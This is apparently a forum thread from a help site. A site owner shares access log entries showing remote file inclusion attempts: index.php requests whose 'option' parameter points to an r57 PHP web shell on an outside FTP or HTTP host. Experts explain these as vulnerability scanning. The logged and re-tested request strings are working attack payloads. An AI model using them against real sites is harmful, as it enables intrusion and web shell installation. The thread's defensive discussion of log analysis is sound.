Suspicious Network Protocol Activity

Hi, I found the following lines in the access logs for two of my sites...

site1.com...
179.222.149.150 - - [15/Oct/2013:00:47:08 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 200 31476 "-" "Mozilla/3.0 (compatible; Indy Library)"

site2.com...
179.222.149.150 - - [15/Oct/2013:02:27:35 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"
179.222.149.150 - - [15/Oct/2013:03:02:14 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"

What is the attacker trying to do? Are they trying to upload the r57 file to my server? I searched for it but it's not there.
LVL 1
killdurstAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Zephyr ICTCloud ArchitectCommented:
I think it was someone looking for something like this:

http://www.malangteam.com/2010/06/16/find-r57-and-c99-shells-hidden-inside-php-and-txt-files/

Since I only see GET commands we can assume they were not uploading something.
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
killdurstAuthor Commented:
Assuming that the r57.txt at coopere.coop.br used by the attacker is identical to the one at "http://www.r57shell.net/shell/r57.txt", what kind of response did the attacker get when he executed the following URL?

http://www.site1.com/index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt?

I executed the following command in my browser and the homepage uploaded correctly.
http://www.site1.com/index.php?option=http://www.r57shell.net/shell/r57.txt?

Note that "site1.com" is fictional in this case.
0
Zephyr ICTCloud ArchitectCommented:
I'm not sure what it does exactly, usually the option= is used for views I think ...

You could test it in a secured environment (e.g Virtual Machine), I would do it, but I'm at work and don't have access to one.

It could just download the file or it might just give an error 404 page not found.

In your test it just went to the front page because it couldn't find the option probably?

Maybe some other expert can give more insight in the web part?

Did you use the website tips to search for the files on your server? I know you already searched for it and couldn't find anything, just making sure.
0
Dave HoweSoftware and Hardware EngineerCommented:
What they are trying to do is test for a relay vulnerability in your index.php - specifically, that it will download a file from the ftp site specified in the option argument.  Assuming this isn't the case, you can safely ignore as the sort of Internet background scanning that goes on all the time - but DO check that is the case first though :)
0
Zephyr ICTCloud ArchitectCommented:
What they are trying to do is test for a relay vulnerability in your index.php

That's what I figured as well ... But wasn't sure, thanks for clarifying.
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Linux Security

From novice to tech pro — start learning today.